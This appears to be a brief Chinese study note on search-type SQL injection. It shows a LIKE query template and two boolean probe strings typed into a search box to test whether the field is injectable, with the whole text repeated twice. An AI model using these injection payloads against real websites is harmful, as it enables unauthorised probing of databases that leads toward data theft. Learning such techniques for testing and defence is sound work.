SQL--搜索型注入
查询语句:SELECT * from sqltest where names like'%要查询的关键字%'
在搜索框内输入1%' and 1=1 and '%'='正常回显;
在搜索框内输入1%' and 1=2 and '%'='报错则存在注入,
之后搜索关键词。
查询语句:SELECT * from sqltest where names like'%要查询的关键字%'
在搜索框内输入1%' and 1=1 and '%'='正常回显;
在搜索框内输入1%' and 1=2 and '%'='报错则存在注入,
之后搜索关键词。
